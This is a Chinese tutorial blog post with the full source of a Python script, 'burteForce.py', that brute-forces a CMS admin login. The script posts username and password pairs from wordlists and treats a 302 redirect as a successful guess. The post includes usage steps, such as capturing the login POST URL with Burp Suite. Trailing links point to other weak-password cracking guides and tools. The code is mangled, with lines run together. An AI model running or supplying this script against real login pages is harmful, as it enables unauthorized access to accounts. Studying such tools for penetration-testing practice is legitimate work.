Python--弱口令字典爆破
语言:python
脚本名:burteForce.py
使用模块requests、sys
原理:通过对比登录失败与登录成功的差异性来判断是否成功
cms网站后台管理,登录成功后会重定向跳转到后台管理页面,此时bp抓包,响应行的状态码应该是302,通过对比登录失败与登录成功的状态码来进行字典爆破
注意:requests模块中post传参,需要传递 allow_redirects = False,意为传参后不进行跳转
源码:
# burteForce.py
import requests
import sysprint("欢迎使用Burte Force!".center(30))
print("\n\n\n")url = sys.argv[1] #输入post请求的url
def burteForce(url,username,password):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',}data = {"username" : username,"password" : password,"image.x" : "70","image.y" : "30"}res = requests.post(url= url , headers= headers , data= data, allow_redirects = False)return res.status_code
# print(state)
state1 = burteForce(url,"abcdef","123456") #登录失败的响应行状态码
print("请输入字典(格式C:\\\\)")
userlistPath = input("userlist:") #输入用户名字典
passlistPath = input("passlist:") #输入密码字典
user = []
password = []
with open(userlistPath,"r") as f :user = f.readlines()
with open(passlistPath,"r") as f1 :password = f1.readlines()
print("\n开始爆破\n")
for i in user :for j in password :state = burteForce(url,i.strip(),j.strip())if state1 != state:print("爆破成功:\n账号:{}密码:{}".format(i,j))exit()else:# print(res1.status_code)pass
如何使用:
注意:网址必须为post请求的url,在登录界面随便输入账号密码后,使用bp拦截抓包
例如以下抓包为post请求数据包,与url拼接得到 http://”ip address“/cms/admin/login.action.php
Python--弱口令字典爆破相关推荐
- 米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历
米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...
- 米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
米斯特白帽培训讲义 漏洞篇 弱口令.爆破.遍历 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 成因 弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜 ...
- mysql弱口令字典_自制弱口令字典top100
在进行密码字典攻击时,经常使用到一些弱口令字典.而这些若口令字典基本都是通过各大网站泄露的密码,统计出使用频率最多的密码作为字典.这样就可以大大提高成功率.相信大家都听说过CSDN top 100,1 ...
- 弱口令安全弱口令字典
知识点 弱口令的安全问题介绍 弱口令的对象 弱口令的防范 弱口令的安全问题 弱口令呢,通俗一点就是对账户密码的暴力猜解 黑客呢会通过工具软件或者是,脚本对目标的账户进行暴力猜解 当然不是只要弱口令就能 ...
- 一个关于弱口令字典的生成器
一个关于弱口令字典的生成器 它通过用户输入的关键词排列组合出所有可能的字典,针对性更强 code: import itertoolsstring = '' f = open('dic.txt', 'a ...
- 利用企业员工信息表中的员工信息,生成有针对性的弱口令字典
很多员工喜欢把自己办公系统的密码设置为姓名+特殊字符+手机号(或生日),如zhangsan.18203600001,zhangsan.1980,zhangsan*19800625,zhangsan#1 ...
- 弱口令(Weak Password)总结和爆破工具
文章目录 弱口令定义 弱口令字典 通过社工定制字典库 弱口令字典 爆破工具 超级弱口令检查工具 水影-域信息收集 WebCrack BurpSuite的intruder模块 hydra 弱口令定义 网 ...
- 常见的弱口令爆破工具
弱口令总结和爆破工具 弱口令定义 网站管理.运营人员由于安全意识不足,为了方便.避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等. 攻击者利用此漏洞可直接进入应用系统或者管理 ...
- 弱口令总结和爆破工具
弱口令总结和爆破工具 弱口令定义 网站管理.运营人员由于安全意识不足,为了方便.避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等. 攻击者利用此漏洞可直接进入应用系统或者管理 ...
最新文章
- winform 控件半透明设置
- FPGA之道(43)编写纯净的组合或时序逻辑
- [转载]javascript创建对象的几种方式
- emf java_Java实现emf图片字节流转png(jpg)图片字节流
- 07-狄克斯特拉算法
- day22-面向对象之封装
- mysql 列转置_MySQL行列转置方法
- c语言数据类型简介表格,C语言基本数据类型简介.docx
- 因开源协议“大打出手”,AWS 宣布创建 Elasticsearch、Kibana 分支
- Python 做自动化测试环境搭建
- tensorflow2.0五种机器学习算法对中文文本分类
- 机器学习框架_机器学习中的概率框架
- caffe 连接 matlab2016b
- 360奇酷手机线刷教程
- cygwin3下编译redis6.2
- 计算机无法打印 重启又好了,打印机显示通讯错误,不能打印,但电脑重启后又好了!这是为什么?...
- Linux编写C++程序
- 【热点解读】冬奥会上的中国元素
- 【C++】细说C语言头文件的路径
- Leon‘s Life
热门文章
- STM32--汇编语言:子程呼叫与无条件跳转指令B、BL、BX和BLX
- 台式计算机电源怎么看,如何查看台式机电源功率
- 2020巅峰极客wp
- Briefings in Bioinformatics2021 | 药物挖掘分子设计--生成模型综述
- Matlab中点到直线距离计算
- nginx启动报 server name * has suspicious symbols
- PrintDocument打印、预览、打印机设置和打印属性的方法(较完整)
- 安卓来电归属地_比尔·盖茨懊悔让微软损失4000亿美金!当年为何会与安卓失之交臂?...
- IDEA编译报错Failure to find com.lowagie:itext:jar:2.1.7.js4,依赖报错
- Alamps学习设计模式之备忘录模式(笑话:劫个色OR抢个鸡蛋版)